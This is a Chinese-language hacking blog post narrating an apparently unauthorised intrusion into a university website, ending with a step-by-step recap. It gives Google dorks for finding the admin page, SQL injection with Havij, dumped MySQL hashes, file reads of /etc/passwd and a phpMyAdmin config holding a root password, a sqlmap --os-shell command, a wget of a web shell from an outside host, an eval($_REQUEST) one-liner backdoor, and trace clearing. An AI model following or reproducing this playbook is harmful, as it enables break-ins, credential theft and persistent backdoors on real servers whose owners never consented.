作者：backlion   发布：2013-09-03 14:13   分类： 入侵实例   阅读：170 views    抢沙发  

0×00信息收集

无意中发现了个注入链接，到底怎么发现的我也不知道，反正不是扫的。

http://www.2cto.com /xxxxxx?id=12

谷歌找到后台

site:f4ck.edu.cninurl:admin

http://www.2cto.com /xxx/xxx.php

0×01账号密码获取

先利用注入点。

丢进Havij跑出数据库

跑出数据库账号密码

如图

破解admin密码失败，如图

然后破解其他的用户，获得密码为123xxxxx登陆后，无可以利用地方，如

查看其他的超级管理员，密码都没有破解成功，其中一个cmd5显示破解成功，但需购买，但

实际是即使购买，它会提示没法破解。我擦。如图

继续。看见mysql

读取账号密码信息，又发现了phpmyadmin

先读取mysql的用户密码信息

Data

Found:

User=xxx

Data

Data

Data

Data

Data

Found:

Found:

Found:

Found:

Found:

Password=*3A3DAA719C86DA543FF1A9E27DB6E59xxxxxxxxx

User=pku_xxx

Password=*3EDC2D4C98204DC580FCE638B8B3FA7xxxxxxxxx

User=root

Password=*EF9C0D7D80D1B158F3958176F869AAC9xxxxxxxx

查root密码时候又是提示购买，要购买时又提示无法解密。Fuck啊。

0×02转战phpmyadmin

后台传shell无望，转战phpmyadmin

在网站后添加phpmyadmin如图

输了几个常用的账号密码没结果。再看看那个读文件的功能

如图，可以读出/etc/passwd文件的内容

如图G-7

之后就是看看能能知道默认的配置文件，依据服务器信息如图G-8，判断是Apache之后填写

默认的安装目录，默认的默认配置文件，

读/etc/issue获得操作系统Ubuntu10.10\n\l

读/usr/local/apache/conf/httpd.conf失败

读/usr/local/apache/conf/httpd.conf失败

工具都提示Iamidle….。

然后就继续打算猜目录了，phpmyadmin爆路径，但都没爆出，这个phpmyadmin貌似有点怪。

然后Google

site:www.2cto.com warning:

site:www.2cto.com error:

也没搞到。然后就是拼人品。

0×03发现xampp

user

听着《第一首情歌》，继续。

忽然看到那个phpmyadmin的登陆界面中有

然后搜索获得xampp默认安装信息如图G-9

xamppuser

如图f的那样。

File/Directory

Purpose

/opt/lampp/bin/

/opt/lampp/htdocs/

/opt/lampp/etc/httpd.con

f/opt/lampp/etc/my.cnf

/opt/lampp/etc/php.ini

/opt/lampp/etc/proftpd.c

onf

/opt/lampp/phpmyadmin/co

nfig.inc.php

TheXAMPPcommandshome./opt/lampp/bin/mysqlcallsfor

exampletheMySQLmonitor.

TheApacheDocumentRootdirectory.

TheApacheconfigurationfile.

TheMySQLconfigurationfile.

ThePHPconfigurationfile.

TheProFTPDconfigurationfile.(since0.9.5)

ThephpMyAdminconfigurationfile.

读文件

读/opt/lampp/phpmyadmin/config.inc.php

获得信息如图G-10

$cfg['Servers'][$i]['user']

=’root’;

$cfg['Servers'][$i]['password']

=’91xxxx’;

不过它的亮点是commentskey啦啦啦。。

果断连接phpmyadmin，然后我擦哇，输入没反应，这个是个啥子情况。

然后继续读文件，看能读到配置文件不。

读/opt/lampp/htdocs/index.php

找到配置文件，

如图G-11

第60页共633页

继续读/opt/lampp/htdocs/inc/conn.php

没密码哇哈哈。

之后可以写一句话木马文件进去，但是pangolin没写入。

Itsaidthetargetmustsetmagic_quotes_gpctooff

执行数据库查询语句

select”intooutfile’/opt/lampp/htdocs/fuck.php’

失败

0×04拿起Sqlmap

然后想起了sqlmap它弹个shell出来。

命令：sqlmap.py-u”http://www.2cto.com /xxx.php?id=12″–os-shell

输入web路径/opt/lampp/htdocs/之后弹出的shell，如图G-12

查看whoami

如图G-13

lscat命令可以执行cdvi等命令都没法执行

列目录时输入ls/则命令成功

之后发现可以利用wget命令，但是很明显弱智了，直接wgethttp://fuck.uk/a.php额。。

然后直接wget

Cata.txt

结果为

http://fuck.uk/a.txt

之后，发现没法重命名，试了下，wget个rar文件，然后解压也不行。额。。其实cp

可以执行的，直接cpa.txta.php就成功啦。菜刀连接，失败。。Fuck。。。。

之后看了下一句话

而如果php设置文件中的

和mv是

short_open_tag是open的话才可以使用

重新wget之后如图

G-14

?>

所以最好用

eval($_request[fuck])?>

菜刀连接如图G-15

Ok….提权啥子的先不搞了。

0×05敏感信息收集

搜索各种账号密码信息，清理痕迹

suggestion

no suggestion

—————————————————————————————————————

本次实战渗透总结经验：

1.用扫描SQL注入工具找到了注入点：http://f4ck.edu.cn /xxxxxx?id=12

2.site:f4ck.edu.cn inurl:admin //用GOOGLE语法找到网站后台

3.把注入点放到havj里面跑跑，跑出了几个密码，试了几个密码都没用

4.再看看PHPmysql数据库配置信息，看到了用户名和密码（MD5加密了的）结果都没破解出来；

5.放到stuctr2工具中的文件读取中输入:/etc/passwd  //查看各种密码以及得到服务器的各种路径信息

6./etc/issue （读取服务器信息）/usr/local/apache/conf/httpd.con 查看apche服务器的配置

7.用goole黑客语句：site:f4ck.edu.cn warning:    site:f4ck.edu.cn error:

8.用sqlmap语句：sqlmap.py-u”http://f4ck.edu.cn /xxx.php?id=12″–os-shell //sqlmap中弹出SHELL反弹

本文固定链接:http://www.backlion.com/%e5%8f%8b%e6%83%85%e6%a3%80%e6%b5%8b%e5%8c%97%e4%ba%ac%e6%9f%90%e5%a4%a7%e5%ad%a6%e7%bd%91%e7%ab%99/ | backion渗透测试研究中心